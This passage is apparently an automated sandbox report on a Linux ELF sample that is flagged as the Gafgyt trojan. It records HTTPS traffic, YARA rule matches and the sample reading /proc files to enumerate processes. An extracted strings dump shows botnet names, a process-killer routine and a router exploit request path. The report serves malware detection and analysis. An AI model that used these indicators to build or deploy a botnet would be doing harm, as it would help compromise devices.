Source: unknownNetwork traffic detected: HTTP traffic on port 53766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40502
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40508
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40506
Source: unknownNetwork traffic detected: HTTP traffic on port 43988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40500
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52548
Source: unknownNetwork traffic detected: HTTP traffic on port 39816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52542
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39510
Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52540
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39512
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52546
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39514
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52544
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39506
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
Source: unknownNetwork traffic detected: HTTP traffic on port 36780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39508
Source: unknownNetwork traffic detected: HTTP traffic on port 57288 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
Source: unknownNetwork traffic detected: HTTP traffic on port 39456 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
Source: unknownNetwork traffic detected: HTTP traffic on port 40854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 37202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40570
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39580
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39582
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39584
Source: unknownNetwork traffic detected: HTTP traffic on port 49618 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55502 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39586
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
Source: unknownNetwork traffic detected: HTTP traffic on port 46582 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39588
Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40568
Source: unknownNetwork traffic detected: HTTP traffic on port 38106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 33716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40562
Source: unknownNetwork traffic detected: HTTP traffic on port 47486 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40560
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40564
Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39570
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39574
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39576
Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39578
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
Source: unknownNetwork traffic detected: HTTP traffic on port 35082 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40558
Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
Source: unknownNetwork traffic detected: HTTP traffic on port 41758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40552
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40550
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40556
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40554
Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
Source: unknownNetwork traffic detected: HTTP traffic on port 35094 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39560
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39562
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39564
Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39568
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40548
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 39828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
Source: unknownNetwork traffic detected: HTTP traffic on port 45712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40540
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40544
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40542
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
Source: unknownNetwork traffic detected: HTTP traffic on port 49606 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52506
Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52504
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
Source: unknownNetwork traffic detected: HTTP traffic on port 38118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39550
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
Source: unknownNetwork traffic detected: HTTP traffic on port 39432 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52508
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39552
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
Source: unknownNetwork traffic detected: HTTP traffic on port 33704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39554
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39556
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52502
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 47498 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40538
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39548
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40536
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40534
Source: unknownNetwork traffic detected: HTTP traffic on port 45256 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40532
Source: unknownNetwork traffic detected: HTTP traffic on port 51536 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 40036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40492
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52476
Source: unknownNetwork traffic detected: HTTP traffic on port 44376 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52474
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
Source: unknownNetwork traffic detected: HTTP traffic on port 59878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52478
Source: unknownNetwork traffic detected: HTTP traffic on port 51176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52482
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52480
Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40486
Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40484
Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40488
Source: unknownNetwork traffic detected: HTTP traffic on port 35922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 34562 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39490
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40482
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39492
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40480
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39494
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
Source: unknownNetwork traffic detected: HTTP traffic on port 33236 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52484
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39498
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52490
Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52492
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40474
Source: unknownNetwork traffic detected: HTTP traffic on port 55034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40472
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40478
Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40476
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39480
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39482
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40470
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39484
Source: unknownNetwork traffic detected: HTTP traffic on port 55046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39486
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52498
Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39488
Source: unknownNetwork traffic detected: HTTP traffic on port 35934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52496
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
Source: unknownNetwork traffic detected: HTTP traffic on port 59854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
Source: unknownNetwork traffic detected: HTTP traffic on port 44388 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40464
Source: unknownNetwork traffic detected: HTTP traffic on port 33728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
Source: unknownNetwork traffic detected: HTTP traffic on port 41386 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40468
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40466
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
Source: unknownNetwork traffic detected: HTTP traffic on port 56852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 40494 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 45700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40460
Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39470
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39472
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39474
Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39478
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
Source: unknownNetwork traffic detected: HTTP traffic on port 34574 -> 443

System Summary

barindex
Source: HH5LnBFw1p.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 5491.1.00007f1894400000.00007f189442b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: HH5LnBFw1p.elf PID: 5491, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm5arm6arm7mipsmpslx86_64sh4abcdefghijklmnopqrstuvw012345678/proc/proc/%s/cmdline/proc/%d/exe/proc/%s/statusName:%s/bin/busybox/bin/systemd/usr/bintest/tmp/condi/tmp/zxcr9999/tmp/condinetwork/var/condibot/var/zxcr9999/var/CondiBot/var/condinet/bin/watchdog[killer] Failed to create child process.niugaboatnetSSHrobbinkreborcodssh.vegasecMozimoziCutieWTFOhshitdeletedbotnetdvrHelper.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86mipselppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.POST /goform/set_LimitClient_cfg HTTP/1.1
Source: ELF static info symbol of initial sample.symtab present: no
Source: HH5LnBFw1p.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 5491.1.00007f1894400000.00007f189442b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: HH5LnBFw1p.elf PID: 5491, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: classification engineClassification label: mal84.troj.linELF@0/8@19/0
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/3760/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/3760/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/3761/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/3761/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/1583/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/1583/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/2672/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/2672/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/110/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/111/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/112/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/113/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/234/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/1577/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/1577/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/114/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/235/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/115/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/116/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/117/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/118/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/119/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/10/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/10/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/917/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/11/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/11/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/12/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/12/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/13/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/13/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/14/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/14/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/15/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/15/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/16/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/16/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/17/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/17/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/18/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/18/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/19/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/19/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/1593/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/1593/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/240/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/240/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/120/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/120/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/3094/statusJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/3094/cmdlineJump to behavior
Source: /tmp/HH5LnBFw1p.elf (PID: 5495)File opened: /proc/121/statusJump to behavior
